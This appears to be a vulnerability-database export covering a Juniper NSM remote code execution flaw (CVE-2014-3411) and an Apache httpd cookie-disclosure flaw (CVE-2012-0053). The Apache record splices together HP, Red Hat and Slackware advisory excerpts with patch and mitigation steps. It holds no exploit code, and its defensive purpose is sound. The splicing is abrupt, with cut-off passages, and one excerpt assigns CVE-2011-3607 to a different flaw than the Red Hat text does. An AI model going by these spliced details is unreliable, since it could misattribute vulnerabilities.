"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3411", "trust": 1.8, "value": "HIGH" }, { "author": "ZDI", "id": "CVE-2014-3411", "trust": 0.7, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201405-316", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-71351", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-297" }, { "db": "VULHUB", "id": "VHN-71351" }, { "db": "JVNDB", "id": "JVNDB-2014-002564" }, { "db": "NVD", "id": "CVE-2014-3411" }, { "db": "CNNVD", "id": "CNNVD-201405-316" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in the NSM XDB service in Juniper NSM before 2012.2R8 allows remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the XDB service. The issue lies in the ability to connect to the service with a remote debugger. An attacker can leverage this vulnerability to execute code under the context of the Java service, which can then be used in conjunction with a privilege escalation vulnerability to gain root privileges", "sources": [ { "db": "NVD", "id": "CVE-2014-3411" }, { "db": "JVNDB", "id": "JVNDB-2014-002564" }, { "db": "ZDI", "id": "ZDI-14-297" }, { "db": "BID", "id": "67445" }, { "db": "VULHUB", "id": "VHN-71351" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3411", "trust": 3.5 }, { "db": "JUNIPER", "id": "JSA10625", "trust": 2.0 }, { "db": "SECUNIA", "id": "58684", "trust": 1.7 }, { "db": "BID", "id": "67445", "trust": 1.4 }, { "db": "SECTRACK", "id": "1030253", "trust": 1.1 }, { "db": "ZDI", "id": "ZDI-14-297", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-002564", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2151", "trust": 0.7 }, { "db": "CNNVD", "id": "CNNVD-201405-316", "trust": 0.7 }, { "db": "VULHUB", "id": "VHN-71351", "trust": 0.1 } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-297" }, { "db": "VULHUB", "id": "VHN-71351" }, { "db": "BID", "id": "67445" }, { "db": "JVNDB", "id": "JVNDB-2014-002564" }, { "db": "NVD", "id": "CVE-2014-3411" }, { "db": "CNNVD", "id": "CNNVD-201405-316" } ] }, "id": "VAR-201405-0180", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-71351" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T12:30:42.137000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "JSA10625", "trust": 0.8, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10625" }, { "title": "Juniper has issued an update to correct this vulnerability.", "trust": 0.7, "url": "http://kb.juniper.net/jsa10625" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-297" }, { "db": "JVNDB", "id": "JVNDB-2014-002564" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3411" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.9, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10625" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58684" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/67445" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1030253" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3411" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3411" }, { "trust": 0.7, "url": "http://kb.juniper.net/jsa10625" }, { "trust": 0.3, "url": "http://www.juniper.net/us/en/products-services/security/nsm/" }, { "trust": 0.3, "url": "http://www.zerodayinitiative.com/advisories/zdi-14-297/" }, { "trust": 0.1, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10625" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-297" }, { "db": "VULHUB", "id": "VHN-71351" }, { "db": "BID", "id": "67445" }, { "db": "JVNDB", "id": "JVNDB-2014-002564" }, { "db": "NVD", "id": "CVE-2014-3411" }, { "db": "CNNVD", "id": "CNNVD-201405-316" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-14-297" }, { "db": "VULHUB", "id": "VHN-71351" }, { "db": "BID", "id": "67445" }, { "db": "JVNDB", "id": "JVNDB-2014-002564" }, { "db": "NVD", "id": "CVE-2014-3411" }, { "db": "CNNVD", "id": "CNNVD-201405-316" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-08-27T00:00:00", "db": "ZDI", "id": "ZDI-14-297" }, { "date": "2014-05-19T00:00:00", "db": "VULHUB", "id": "VHN-71351" }, { "date": "2014-05-16T00:00:00", "db": "BID", "id": "67445" }, { "date": "2014-05-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002564" }, { "date": "2014-05-19T14:55:12.047000", "db": "NVD", "id": "CVE-2014-3411" }, { "date": "2014-05-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201405-316" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-08-27T00:00:00", "db": "ZDI", "id": "ZDI-14-297" }, { "date": "2017-01-07T00:00:00", "db": "VULHUB", "id": "VHN-71351" }, { "date": "2015-03-19T09:37:00", "db": "BID", "id": "67445" }, { "date": "2014-05-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002564" }, { "date": "2017-01-07T02:59:59.097000", "db": "NVD", "id": "CVE-2014-3411" }, { "date": "2014-05-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201405-316" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201405-316" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NSM of NSM XDB Vulnerability in arbitrary code execution in a service", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-002564" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "67445" } ], "trust": 0.3 } }
var-201201-0038
Vulnerability from variot
protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script. Apache HTTP Server is prone to an information-disclosure vulnerability. The issue occurs in the default error response for status code 400. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. The vulnerability affects Apache HTTP Server versions 2.2.0 through 2.2.21. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03691745
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03691745 Version: 1
HPSBST02848 SSRT101112 rev.1 - HP XP P9000 Command View Advanced Edition Suite Products, Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2013-03-27 Last Updated: 2013-03-27
Potential Security Impact: Remote disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP XP P9000 Command View Advanced Edition Suite products including HP P9000 Command View Advanced Edition Software (DevMgr), HP XP Provisioning Manager Software (ProvMgr), HP P9000 Replication Manager Software (RepMgr), and HP P9000 Tiered Storage Manager Software (TSMgr). The vulnerability could be remotely exploited resulting in a disclosure of information.
References: CVE-2012-0053
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP XP P9000 Command View Advanced Edition Suite Software:
Software Product Affected Versions (Platform)
HP P9000 Command View Advanced Edition Software (DevMgr) 7.0.0-00 to earlier than 7.4.1-00 (Windows/Linux)
HP XP Provisioning Manager Software (ProvMgr) 5.0.0-00 to earlier than 7.0.0-00 (Windows/Linux)
NOTE : From version 7.0.0-00 and subsequent, ProvMgr has been integrated into DevMgr.
HP P9000 Tiered Storage Manager Software (TSMgr) 5.0.0-00 to earlier than 7.4.1-00 (Windows/Linux)
HP P9000 Replication Monitor Software (RepMon) 5.0.0-00 to earlier than 6.0.0-00 (Windows)
HP P9000 Replication Manager Software (RepMgr) 6.0.0-00 to earlier than 7.4.1-00 (Windows) 7.0.0-00 to earlier than 7.4.1-00 (Linux)
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2012-0053 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following updates for HP XP P9000 Command View Advanced Edition Suite products. In addition, instructions for a Mitigation Solution are also provided below.
Software Product Software Version Updates (Platform)
HP P9000 Command View Advanced Edition Software (DevMgr) 7.4.1-00 or subsequent (Windows/Linux)
HP XP Provisioning Manager Software (ProvMgr) Please apply the Mitigation Solution below
HP P9000 Tiered Storage Manager Software (TSMgr) 7.4.1-00 or subsequent (Windows/Linux)
HP P9000 Replication Monitor Software (RepMon) Please apply the Mitigation Solution below
HP P9000 Replication Manager Software (RepMgr) 7.4.1-00 or subsequent (Windows/Linux)
Mitigation Solution - The following procedure can be applied to avoid this vulnerability:
Open a command window and change to the current directory by executing the following command:
Windows...
cd Common-Component-installation-directory\bin
Linux ...
cd Common-Component-installation-directory/bin
Stop the services of P9000 Command View AE Suite products by executing the following command:
hcmdssrv /stop
Backup the file below, then open it with a text editor:
Windows...
Common-Component-installation-directory\httpsd\conf\httpsd.conf
Linux ...
Common-Component-installation-directory/httpsd/conf/httpsd.conf
In the above file, after the line:
(ErrorDocument 417 "Expectation Failed"),
Add the line :
(ErrorDocument 400 "Bad Request")
NOTE : For the products listed below, a slightly different version of the line must be added instead. Product Version (Platform)
CVXPAE 5.0.0-00 to earlier than 5.8.0-00 (Windows) 5.1.0-00 to earlier than 5.8.0-00 (Linux)
ProvMgr 5.0.0-00 to earlier than 5.8.0-00 (Windows) 5.1.0-00 to earlier than 5.8.0-00 (Linux)
TSMgr 5.0.0-00 to earlier than 5.8.0-00 (Windows) 5.1.0-00 to earlier than 5.8.0-00 (Linux)
RepMon 5.0.0-00 to earlier than 5.8.0-00 (Windows)
Add the following line to the end of the file styled in the following manner:
(ErrorDocument 400 "Bad Request)
NOTE : Bad Request is entered without the closing double quotation mark. If this line already exists in the file, do not add it.
Save the modified file.
Start the services of the XP P9000 Command View AE Suite products by executing the following command:
hcmdssrv /start
HISTORY Version:1 (rev.1) - 27 March 2013 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: httpd security update Advisory ID: RHSA-2012:0128-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0128.html Issue date: 2012-02-13 CVE Names: CVE-2011-3607 CVE-2011-3639 CVE-2011-4317 CVE-2012-0031 CVE-2012-0053 =====================================================================
- Summary:
Updated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64
It was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1391) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)
The httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies. (CVE-2012-0053)
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions. An attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a ".htaccess" file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the "apache" user. (CVE-2011-3607)
A flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown. (CVE-2012-0031)
All httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.
- Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259
- Bugs fixed (http://bugzilla.redhat.com/):
752080 - CVE-2011-3639 httpd: http 0.9 request bypass of the reverse proxy vulnerability CVE-2011-3368 fix 756483 - CVE-2011-4317 httpd: uri scheme bypass of the reverse proxy vulnerability CVE-2011-3368 fix 769844 - CVE-2011-3607 httpd: ap_pregsub Integer overflow to buffer overflow 773744 - CVE-2012-0031 httpd: possible crash on shutdown due to flaw in scoreboard handling 785069 - CVE-2012-0053 httpd: cookie exposure due to error responses
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm
i386: httpd-2.2.15-15.el6_2.1.i686.rpm httpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm httpd-tools-2.2.15-15.el6_2.1.i686.rpm
x86_64: httpd-2.2.15-15.el6_2.1.x86_64.rpm httpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm httpd-tools-2.2.15-15.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm
i386: httpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm httpd-devel-2.2.15-15.el6_2.1.i686.rpm mod_ssl-2.2.15-15.el6_2.1.i686.rpm
noarch: httpd-manual-2.2.15-15.el6_2.1.noarch.rpm
x86_64: httpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm httpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm httpd-devel-2.2.15-15.el6_2.1.i686.rpm httpd-devel-2.2.15-15.el6_2.1.x86_64.rpm mod_ssl-2.2.15-15.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm
x86_64: httpd-2.2.15-15.el6_2.1.x86_64.rpm httpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm httpd-tools-2.2.15-15.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm
noarch: httpd-manual-2.2.15-15.el6_2.1.noarch.rpm
x86_64: httpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm httpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm httpd-devel-2.2.15-15.el6_2.1.i686.rpm httpd-devel-2.2.15-15.el6_2.1.x86_64.rpm mod_ssl-2.2.15-15.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm
i386: httpd-2.2.15-15.el6_2.1.i686.rpm httpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm httpd-devel-2.2.15-15.el6_2.1.i686.rpm httpd-tools-2.2.15-15.el6_2.1.i686.rpm mod_ssl-2.2.15-15.el6_2.1.i686.rpm
noarch: httpd-manual-2.2.15-15.el6_2.1.noarch.rpm
ppc64: httpd-2.2.15-15.el6_2.1.ppc64.rpm httpd-debuginfo-2.2.15-15.el6_2.1.ppc.rpm httpd-debuginfo-2.2.15-15.el6_2.1.ppc64.rpm httpd-devel-2.2.15-15.el6_2.1.ppc.rpm httpd-devel-2.2.15-15.el6_2.1.ppc64.rpm httpd-tools-2.2.15-15.el6_2.1.ppc64.rpm mod_ssl-2.2.15-15.el6_2.1.ppc64.rpm
s390x: httpd-2.2.15-15.el6_2.1.s390x.rpm httpd-debuginfo-2.2.15-15.el6_2.1.s390.rpm httpd-debuginfo-2.2.15-15.el6_2.1.s390x.rpm httpd-devel-2.2.15-15.el6_2.1.s390.rpm httpd-devel-2.2.15-15.el6_2.1.s390x.rpm httpd-tools-2.2.15-15.el6_2.1.s390x.rpm mod_ssl-2.2.15-15.el6_2.1.s390x.rpm
x86_64: httpd-2.2.15-15.el6_2.1.x86_64.rpm httpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm httpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm httpd-devel-2.2.15-15.el6_2.1.i686.rpm httpd-devel-2.2.15-15.el6_2.1.x86_64.rpm httpd-tools-2.2.15-15.el6_2.1.x86_64.rpm mod_ssl-2.2.15-15.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm
i386: httpd-2.2.15-15.el6_2.1.i686.rpm httpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm httpd-devel-2.2.15-15.el6_2.1.i686.rpm httpd-tools-2.2.15-15.el6_2.1.i686.rpm mod_ssl-2.2.15-15.el6_2.1.i686.rpm
noarch: httpd-manual-2.2.15-15.el6_2.1.noarch.rpm
x86_64: httpd-2.2.15-15.el6_2.1.x86_64.rpm httpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm httpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm httpd-devel-2.2.15-15.el6_2.1.i686.rpm httpd-devel-2.2.15-15.el6_2.1.x86_64.rpm httpd-tools-2.2.15-15.el6_2.1.x86_64.rpm mod_ssl-2.2.15-15.el6_2.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2011-3607.html https://www.redhat.com/security/data/cve/CVE-2011-3639.html https://www.redhat.com/security/data/cve/CVE-2011-4317.html https://www.redhat.com/security/data/cve/CVE-2012-0031.html https://www.redhat.com/security/data/cve/CVE-2012-0053.html https://access.redhat.com/security/updates/classification/#moderate https://rhn.redhat.com/errata/RHSA-2011-1391.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPOXUIXlSAg2UNWIIRAg4AAJ9vTPttyKrbHbaSV7xCAzG89ytZgACfTSq+ HOLS5+cKusdo+jUiYKIV4mw= =fM2U -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
It was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. (CVE-2011-3368)
It was discovered that mod_proxy_ajp incorrectly returned an "Internal Server Error" response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3607)
A NULL pointer dereference flaw was found in the httpd mod_log_config module.
This update also fixes the following bug:
- The fix for CVE-2011-3192 provided by the RHSA-2011:1330 update introduced a regression in the way httpd handled certain Range HTTP header values. This update corrects this regression. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing JBoss Enterprise Web Server installation (including all applications and configuration files). HP System Management Homepage v7.1.1 is available here:
HP System Management Homepage for Windows x64
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab 0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Windows x86
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7 c0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (AMD64/EM64T)
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18 d373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (x86)
[Download here] or enter the following URL into the browser address window. HP OpenView Network Node Manager (OV NNM) v7.53 running on HP-UX, Linux, and Solaris.
MANUAL ACTIONS: Yes - NonUpdate
Install the hotfix for SSRT100772.
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant. The apr-util package has also been updated to the latest version.
Here are the details from the Slackware 13.37 ChangeLog: +--------------------------+ patches/packages/apr-util-1.4.1-i486-1_slack13.37.txz: Upgraded. Version bump for httpd upgrade. patches/packages/httpd-2.2.22-i486-1_slack13.37.txz: Upgraded. ) SECURITY: CVE-2011-3368 (cve.mitre.org) Reject requests where the request-URI does not match the HTTP specification, preventing unexpected expansion of target URLs in some reverse proxy configurations. [Joe Orton] ) SECURITY: CVE-2011-3607 (cve.mitre.org) Fix integer overflow in ap_pregsub() which, when the mod_setenvif module is enabled, could allow local users to gain privileges via a .htaccess file. [Stefan Fritsch, Greg Ames] ) SECURITY: CVE-2011-4317 (cve.mitre.org) Resolve additional cases of URL rewriting with ProxyPassMatch or RewriteRule, where particular request-URIs could result in undesired backend network exposure in some configurations. [Joe Orton] ) SECURITY: CVE-2012-0021 (cve.mitre.org) mod_log_config: Fix segfault (crash) when the '%{cookiename}C' log format string is in use and a client sends a nameless, valueless cookie, causing a denial of service. The issue existed since version 2.2.17. PR 52256. [Eric Covener] For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4317 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 12.0: ftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/apr-util-1.4.1-i486-1_slack12.0.tgz ftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/httpd-2.2.22-i486-1_slack12.0.tgz
Updated packages for Slackware 12.1: ftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/apr-util-1.4.1-i486-1_slack12.1.tgz ftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/httpd-2.2.22-i486-1_slack12.1.tgz
Updated packages for Slackware 12.2: ftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/apr-util-1.4.1-i486-1_slack12.2.tgz ftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/httpd-2.2.22-i486-1_slack12.2.tgz
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/apr-util-1.4.1-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.22-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/apr-util-1.4.1-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.22-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/apr-util-1.4.1-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.22-i486-1_slack13.1.txz
